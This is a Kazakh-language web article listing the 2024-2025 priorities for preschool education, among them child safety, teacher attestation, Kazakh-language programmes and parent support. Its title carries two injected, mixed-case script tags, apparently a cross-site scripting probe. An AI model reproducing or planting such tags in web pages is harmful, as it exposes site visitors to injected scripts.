2024-2025 ОҚУ ЖЫЛЫНЫҢ НЕГІЗГІ ЕРЕКШЕЛІКТЕРІ<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

22.07.2024

Жаңа оқу жылында Қазақстан Республикасының заңнамасына, Мемлекет басшысының және Үкіметтің тапсырмаларына, сондай-ақ Қазақстан Республикасында мектепке дейінгі, орта, техникалық және кәсіптік білім беруді дамытудың 2023-2029 жылдарға арналған жаңартылған тұжырымдамасының негізгі ережелеріне 1 (бұдан әрі – Тұжырымдама), білім беру саласының стратегиялық және бағдарламалық құжаттарына сәйкес мектепке дейінгі тәрбие мен оқыту жүйесінде (бұдан әрі – МДТО) жұмыстың мынадай бағыттары өзектендірілді:

 **жаңартылған Қағидаларға сәйкес мектепке дейінгі тәрбие мен оқыту саласында қызметтің басталғаны немесе тоқтатылғаны туралы хабарлама; 
** МДҰ мен жалпы білім беретін мектептерде, лицейлер мен гимназияларда мектепалды сыныптарда балалардың қауіпсіз болуын қамтамасыз ету;
** балалармен, ата-аналармен және айналасындағылармен қарымқатынас жасауда педагогикалық әдеп нормаларын қатаң сақтау, зорлықзомбылықтың, буллингтің және балалардың құқықтарын бұзудың кез келген түрін болдырмау;  
**Мектепке дейінгі білім беру саласында мемлекеттік қызметтер көрсетудің жаңартылған қағидаларына сәйкес МДҰ-ға кезектілік пен жолдама беруді есепке алудың Бірыңғай базасы арқылы мемлекеттік қызметтерді іске асыру; 
** Отбасы мен тәрбиеленушілерді әлеуметтiк-педагогикалық қолдау мақсатында мектепке дейінгі тәрбиемен және оқытумен қамтылмаған балалардың ата-аналары үшін білім беру ұйымдарында консультациялық пункттердің қызметін кеңейту; 
** «Балақайлар мектебі» бағдарламасы бойынша қысқа мерзімді мектепалды даярлықты ұйымдастыру; 
** бастауыш сынып мұғалімі жеке оқыту траекториясын анықтау үшін мектепке дейінгі тәрбие мен оқыту, мектепалды даярлық бағдарламаларын меңгеру қорытындысы бойынша мектепалды жастағы баланың Жеке даму картасын қалыптастыру;
**өңірлік ерекшеліктер мен климаттық өзгерістерді ескере отырып, экологиялық білім беру сапасы мен тәрбиеленушілердің экологиялық мәдениетін арттыру; 
** ұлттық мәдениетке қызығушылықты арттыру, қазақ тілін меңгеруге ынталандыру; ** педагогтердің біліктілікті арттыру курстарынан өткізу арқылы мектеп жасына дейінгі балаларға қазақ тілін үйрету бойынша «Тілге бойлау» пилоттық жобасын іске асыру; ** МДҰ мен ата-аналар қауымдастығының ықпалдастығын нығайту, «Әжелер мектебі», «Әкелер мектебі», «Жас аналар мектебі» әлеуметтік институтын дамыту; 
**МДҰ қызметінің басым бағытын айқындау, Даму бағдарламасын әзірлеу;  МДҰ-ның сапаны бағалау өлшемшарттарына сәйкестігін 50% – ға дейін ұлғайту (2023 ж. - 25%); 
** жаңа жүйе бойынша МДҰ педагогтерін аттестаттаудан өткізу; 
** тәрбиеленушілердің білім алудағы жетістіктері негізінде педагогтің қызметін бағалау;
«Ұстаз Ұлттық платформасы» арқылы «Педагог бейіні» цифрлық 2   модулінде кәсіби қызметтің нәтижелерін жинақтау; 
** «жоғары», «бірінші», «екінші» біліктілік санаты бар педагогтер 2024 жылдың соңына дейін жаңа жүйе бойынша аттестаттаудан міндетті түрде өтуі; 
** тәрбиелеу-білім беру процесіне енгізу үшін МДҰ педагогтерінің озық тәжірибесінің электрондық Банкін қалыптастыру;
 ** Құзыреттілік орталықтарында үздік педагогикалық тәжірибе алмасу және тарату; ** Қазақстан Республикасы Оқу-ағарту министрлігі Балаларды ерте дамыту институтының (бұдан әрі – Институт) сайтында4 виртуалды әдістемелік кабинет арқылы педагогтер практикасын және ата-аналарды қолдау; 
** «Білім берудегі өзгерістердің 1000 көшбасшысы» бағдарламасы аясында МДҰ басшыларының республикалық кадрлық резервіне 50 үміткерді іріктеу.
Просмотров: 4515


Пікір қосу



Деректерді қолтаңбаға қосу